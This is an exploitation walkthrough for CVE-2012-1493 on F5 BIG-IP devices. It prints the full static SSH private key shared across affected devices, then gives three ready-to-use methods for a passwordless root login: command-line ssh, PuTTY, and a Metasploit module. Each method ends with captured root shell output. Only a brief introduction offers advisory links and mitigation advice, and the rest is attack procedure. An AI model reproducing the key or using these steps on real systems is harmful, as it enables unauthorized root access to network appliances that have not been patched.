# Exploiting F5 BIG-IP SSH vulnerability

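Introduction

CVE-2012-1493: affected F5 BIG-IP releases ship with the same SSH key pair on every installation, and the matching public key is authorized for root. Anyone who holds the private key can therefore log in as root over SSH without a password. The three options below all demonstrate that same key-based login, here against a BIG-IP 10.2.2 device at 192.168.1.1. The F5 advisory (SOL13600) lists the affected versions and the fix. On a device that has not been fixed, SSH access should be limited to trusted management hosts, and a public-key root login from an unexpected source should be treated as a compromise.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1493
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html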

Option 1: Command-line

# cat f5_private_key 
-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----
# chmod 0600 f5_private_key
# ssh -i f5_private_key root@192.168.1.1
[root@F5-BIG-IP:Active] config # bigpipe platform | grep Platform
|     BIOS revision: F5 Platform: C103 OBJ-0335-01 BIOS (build: 130) Date: 09/12/09
[root@F5-BIG-IP:Active] config # bigpipe version | grep Version
BIG-IP Version 10.2.2 969.0
[root@F5-BIG-IP:Active] config # whoami
root

Option 2: PuTTY

- Use PuTTYgen to convert f5_private_key into a PuTTY private key file (f5_private_key.ppk)
- Execute PuTTY
- Connection/SSH/Auth/Private key file for authentication/Browse...: C:\f5_private_key.ppk
- Session/Host Name (or IP address) and Port: 192.168.1.1:22
- Open

login as: root
Authenticating with public key "imported-openssh-key"
[root@F5-BIG-IP:Active] config # whoami
root

Option 3: Metasploit

# msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf  exploit(f5_bigip_known_privkey) > show payloads
msf  exploit(f5_bigip_known_privkey) > set payload cmd/unix/interact
msf  exploit(f5_bigip_known_privkey) > set lhost 192.168.1.2
msf  exploit(f5_bigip_known_privkey) > set rhost 192.168.1.1
msf  exploit(f5_bigip_known_privkey) > exploit

[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:42298 -> 192.168.1.1:22)

whoami
root
